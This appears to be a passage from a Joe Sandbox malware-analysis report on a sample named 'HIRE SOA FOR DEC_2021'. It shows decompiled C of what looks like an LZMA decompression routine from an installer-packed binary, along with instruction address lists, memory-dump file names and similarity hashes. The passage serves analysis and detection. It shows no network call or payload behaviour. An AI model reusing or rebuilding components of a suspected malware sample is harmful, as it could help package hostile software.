								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ead
0x00405eb4
0x00405eba
0x00405ec0
0x00000000
0x00405ec4
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405ee6
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efb
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f46
0x00405f49
0x00405f71
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4b
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f63
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fba
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fbf
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fdc
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406022
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066ca
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406700
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x00406728
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x004060bc
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x004068d2
0x004068d8
0x004068da
0x004068e1
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 004062EB Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004062EB() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
